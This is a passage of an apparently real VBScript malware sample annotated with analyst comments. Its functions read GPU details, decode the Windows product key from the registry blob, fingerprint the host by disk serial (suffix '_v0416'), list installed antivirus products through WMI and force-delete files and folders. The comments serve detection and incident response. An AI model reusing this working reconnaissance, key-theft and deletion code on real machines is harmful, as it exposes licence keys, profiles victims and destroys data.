       ' Flag value 48 asks WMI for a forward-only result set returned immediately.
       ' This query goes through DT_WMG_DOT, while the CPU and RAM helpers use
       ' DT_WMG_IMP. Both objects are created elsewhere in the file.
  696. on error resume next
  697. set COT_VIDEOCONTROL = DT_WMG_DOT.execquery("Select * from Win32_VideoController",,48)
  698. for each DOI_TUONG_IN_VIDEOCONTROL in COT_VIDEOCONTROL
  699. TENGPU_HAM = DOI_TUONG_IN_VIDEOCONTROL.caption
  700. next
  701. end function
  702. function CVERT_PCKEY_HAM(PRODID)
       ' Decodes the DigitalProductId byte array (PRODID) into a dash-grouped product
       ' key string of the form XXXXX-XXXXX-XXXXX-XXXXX-XXXXX.
       ' Only bytes 52..66 of the blob are used (KEY_MAU = 52, offsets 0..14).
       ' Those bytes are treated as one large number and divided by 24 repeatedly,
       ' with each remainder selecting a character from the 24-symbol alphabet KYTU_SO.
       ' Analyst note: TAPHOPINFOR_HAM places the result in the host profile, so the
       ' licence key of an affected machine should be considered exposed if that
       ' profile left the host.
       ' NOTE(review): the byte-66 flag handling and the inserted "N" look like the
       ' adjustment for newer Windows key formats (the variable name suggests
       ' "Windows 8 and later") - confirm before relying on the decoded value.
       ' PRODID elements are overwritten in place during decoding.
  703. on error resume next
  704. const KEY_MAU = 52
  705. dim CACMAY_WIN8_VE_SAU,KYTU_SO,CHYM,BUOM,HIENTAI,XUAT_KEY,KEY_CUOI,KEY_MOT,CHENVAO
  706. CACMAY_WIN8_VE_SAU = (PRODID(66)\6) and 1
  707. PRODID(66) = (PRODID(66) and &HF7) Or ((CACMAY_WIN8_VE_SAU and 2)*4)
  708. CHYM = 24
  709. KYTU_SO = "BCDFGHJKMPQRTVWXY2346789"
       ' Outer loop: one output character per pass, prepended to XUAT_KEY.
  710. do
  711. HIENTAI = 0
  712. BUOM = 14
       ' Inner loop: long division of the 15-byte number by 24, high byte first.
       ' The quotient is written back into PRODID and the remainder stays in HIENTAI.
  713. do
  714. HIENTAI = HIENTAI * 256
  715. HIENTAI = PRODID(BUOM + KEY_MAU) + HIENTAI
  716. PRODID(BUOM + KEY_MAU) = (HIENTAI\24)
  717. HIENTAI = HIENTAI mod 24
  718. BUOM = BUOM - 1
  719. loop while BUOM >= 0
  720. CHYM = CHYM - 1
  721. XUAT_KEY = mid(KYTU_SO,HIENTAI + 1, 1) & XUAT_KEY
  722. KEY_CUOI = HIENTAI
  723. loop while CHYM >= 0
       ' Insert the letter "N" at a position derived from the last remainder.
  724. KEY_MOT = mid(XUAT_KEY, 2, KEY_CUOI)
  725. CHENVAO = "N"
  726. XUAT_KEY = Replace(XUAT_KEY, KEY_MOT, KEY_MOT & CHENVAO, 2, 1, 0)
  727. if KEY_CUOI = 0 then XUAT_KEY = CHENVAO & XUAT_KEY
       ' Format as five groups of five characters.
  728. CVERT_PCKEY_HAM = mid(XUAT_KEY, 1, 5) & "-" & mid(XUAT_KEY, 6, 5) & "-" & mid(XUAT_KEY, 11, 5) & "-" & mid(XUAT_KEY, 16, 5) & "-" & mid(XUAT_KEY, 21, 5)
  729. end function
  730. function MAHW_HAM
       ' Returns the volume serial number of the first Win32_LogicalDisk instance that
       ' has a non-empty serial, followed by "_". Result stays Empty if none is found.
       ' Analyst note: this is the same machine fingerprint that
       ' LAY_TENVIC_THEOMAHW_HAM uses for the host identifier, so the volume serial of
       ' an affected disk can be matched against captured identifiers.
  731. on error resume next
  732. set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
  733. for each ODIACUNG_SSD in CAC_HDD
  734. if ODIACUNG_SSD.volumeserialnumber <> "" then
  735. MAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_"
  736. exit for
  737. end if
  738. next
  739. end function
  740. function LAY_TENVIC_THEOMAHW_HAM
       ' Returns the host identifier used as the first field of the profile string:
       ' the first non-empty logical-disk volume serial number plus a suffix.
       '   DT_ID_CHO_PC empty or " " : "<serial>_v0416"
       '   otherwise                 : "<serial>_<DT_ID_CHO_PC>"
       ' Analyst note: DT_ID_CHO_PC is a configuration value set at the top of the
       ' file. In this copy it is built from an empty string, so identifiers from this
       ' sample end in "_v0416". That suffix is a usable hunting string.
  741. on error resume next
  742. set CAC_HDD = DT_WMG_IMP.execquery("select * from win32_logicaldisk")
  743. for each ODIACUNG_SSD in CAC_HDD
  744. if ODIACUNG_SSD.volumeserialnumber <> "" then
  745. if DT_ID_CHO_PC = "" Or DT_ID_CHO_PC = " " then
  746. LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_v0416"
  747. else
  748. LAY_TENVIC_THEOMAHW_HAM = Trim(ODIACUNG_SSD.volumeserialnumber) & "_" & DT_ID_CHO_PC
  749. end if
  750. exit for
  751. end if
  752. next
  753. end function
  754. function LAY_TENTRINH_AV_HAM
       ' Returns the display names of registered antivirus products, each followed
       ' by ". ", or the literal "None AV" when the list is empty.
       ' Steps:
       '   1. read the OS version from Win32_OperatingSystem and turn it into a number
       '   2. pick the WMI namespace: root\securitycenter2 when that number is above 6,
       '      otherwise root\securitycenter
       '   3. query "antivirusproduct" there and concatenate each displayname
       ' Analyst note: enumerating AntiVirusProduct from a script host is a
       ' reconnaissance step, and the result goes into the host profile built by
       ' TAPHOPINFOR_HAM. Monitor script-host WMI queries against either namespace.
       ' NOTE(review): the version arithmetic runs under "on error resume next" and
       ' reads .version from the result collection as well as from its items, so do
       ' not assume which namespace this code ends up querying on a given OS.
       ' The version text is also passed to eval(). It comes from local WMI here.
  755. on error resume next
  756. LAY_TENTRINH_AV_HAM = ""
  757. set CAC_DT_THEOCOT_HDH = DT_WMG_IMP.execquery("select * from win32_operatingsystem",,48)
  758. for each DT_AV in CAC_DT_THEOCOT_HDH
  759. PHIENBAN_AV = split(DT_AV.version,".")
  760. next
  761. PHIENBAN_AV = split(CAC_DT_THEOCOT_HDH.version,".")
  762. PHIENBAN_HDH = PHIENBAN_AV(0) & "."
  763. for x = 1 to ubound(PHIENBAN_AV)
  764. PHIENBAN_HDH = PHIENBAN_HDH & PHIENBAN_AV(i)
  765. next
  766. PHIENBAN_HDH = eval(PHIENBAN_HDH)
  767. if PHIENBAN_HDH > 6 then
  768. TRUNGTAM_SECU = "securitycenter2"
  769. else
  770. TRUNGTAM_SECU = "securitycenter"
  771. end if
  772. set DT_TRUNGTAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNGTAM_SECU)
  773. set COT_AV = DT_TRUNGTAM_SECU.execquery("select * from antivirusproduct","wql",0)
  774. for each TEN_AV in COT_AV
  775. LAY_TENTRINH_AV_HAM = LAY_TENTRINH_AV_HAM & TEN_AV.displayname & ". "
  776. next
  777. if LAY_TENTRINH_AV_HAM = "" then LAY_TENTRINH_AV_HAM = "None AV"
  778. set DT_TRUNGTAM_SECU = nothing
  779. end function
  780. function GOBO_KYTUSAI_HAM(CHUOI_DE_SCRUB)
       ' Returns CHUOI_DE_SCRUB with these nine characters removed: | > < " ? * : / \
       ' (Chr(34) is the double quote). Other characters pass through unchanged.
       ' The configuration block at the top of the file runs its file, folder and
       ' registry names through this function.
       ' NOTE(review): the removed set matches characters that Windows does not allow
       ' in file names, and also covers the characters of the MK field separator -
       ' presumably both are intended. Confirm against how the names are used.
  781. dim CHUOI_DA_SCRUB
  782. CHUOI_DA_SCRUB = Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(Replace(CHUOI_DE_SCRUB, "|", ""), ">", ""), "<", ""), Chr(34), ""), "?", ""), "*", ""), ":", ""), "/", ""), "\", "")
  783. GOBO_KYTUSAI_HAM = CHUOI_DA_SCRUB
  784. end function
  785. sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONGDANTEMP_INSUB_AUTOX)
       ' Deletes, inside the given folder, every file and every immediate subfolder
       ' whose creation date is more than 8 days before now. Deletion is forced.
       ' The subfolder pass is repeated 11 times (i = 0 to 10), presumably as a retry
       ' for folders that could not be removed on an earlier pass.
       ' Analyst note: the folder paths come from callers outside this excerpt. The
       ' configuration comment on BATTAT_XOARAC mentions system, user TEMP and IE
       ' folders. Bulk removal of older temp content can erase forensic artefacts, so
       ' collect volatile and temp data early on a suspected host.
       ' Errors (locked files, access denied) are suppressed and not reported.
  786. on error resume next
  787. dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
  788. set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
  789. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB_AUTOX)
  790. for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
  791. if OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_FILE_TEMP.delete(true)
  792. next
  793. for i = 0 to 10
  794. for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
  795. if OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) then OBJ_CAC_DIR_TEMP.Delete(true)
  796. next
  797. next
  798. set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
  799. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
  800. set OBJ_CAC_DIR_TEMP = nothing
  801. set OBJ_CAC_FILE_TEMP = nothing
  802. end sub
  803. sub XOA_FILEVAFOLDER_SUB(STR_DUONGDANTEMP_INSUB)
       ' Deletes every file and every immediate subfolder of the given folder, with
       ' force = true and no age check. The folder itself is not removed.
       ' Same structure as XOA_TEMP_SAU_X_NGAY_SUB, including the subfolder pass
       ' repeated 11 times (i = 0 to 10).
       ' Analyst note: callers and the paths they pass are outside this excerpt.
       ' Because errors are suppressed, items in use simply survive, so a partly
       ' emptied directory is an expected outcome.
  804. on error resume next
  805. dim OBJ_HTHONG_TAPTIN_CHOTEMP,OBJ_DUONGDAN_FOLDER_CANCHO_TEMP,OBJ_CAC_DIR_TEMP,OBJ_CAC_FILE_TEMP,i
  806. set OBJ_HTHONG_TAPTIN_CHOTEMP = CreateObject("Scripting.FileSystemObject")
  807. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = OBJ_HTHONG_TAPTIN_CHOTEMP.GetFolder(STR_DUONGDANTEMP_INSUB)
  808. for each OBJ_CAC_FILE_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.Files
  809. OBJ_CAC_FILE_TEMP.delete(true)
  810. next
  811. for i = 0 to 10
  812. for each OBJ_CAC_DIR_TEMP in OBJ_DUONGDAN_FOLDER_CANCHO_TEMP.SubFolders
  813. OBJ_CAC_DIR_TEMP.Delete(true)
  814. next
  815. next
  816. set OBJ_HTHONG_TAPTIN_CHOTEMP = nothing
  817. set OBJ_DUONGDAN_FOLDER_CANCHO_TEMP = nothing
  818. set OBJ_CAC_DIR_TEMP = nothing
  819. set OBJ_CAC_FILE_TEMP = nothing
  820. end sub